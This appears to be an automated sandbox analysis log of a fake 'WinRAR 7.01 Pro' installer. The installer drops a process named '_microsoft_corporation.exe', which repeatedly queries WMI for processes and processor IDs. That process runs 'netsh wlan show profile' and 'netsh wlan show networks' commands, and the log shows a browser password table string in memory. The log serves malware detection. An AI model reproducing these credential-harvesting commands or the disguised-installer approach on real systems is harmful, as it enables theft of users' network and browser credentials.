Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmp2186.tmp.dat.3.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: WinRAR 7.01 Pro.exe

ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe "C:\Users\user\Desktop\WinRAR 7.01 Pro.exe"
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process created: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe "C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe"
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process created: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe "C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe"
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process created: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe "C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Process created: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe "C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: thumbcache.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: networkexplorer.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: ehstorshell.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Section loaded: msasn1.dll	Jump to behavior
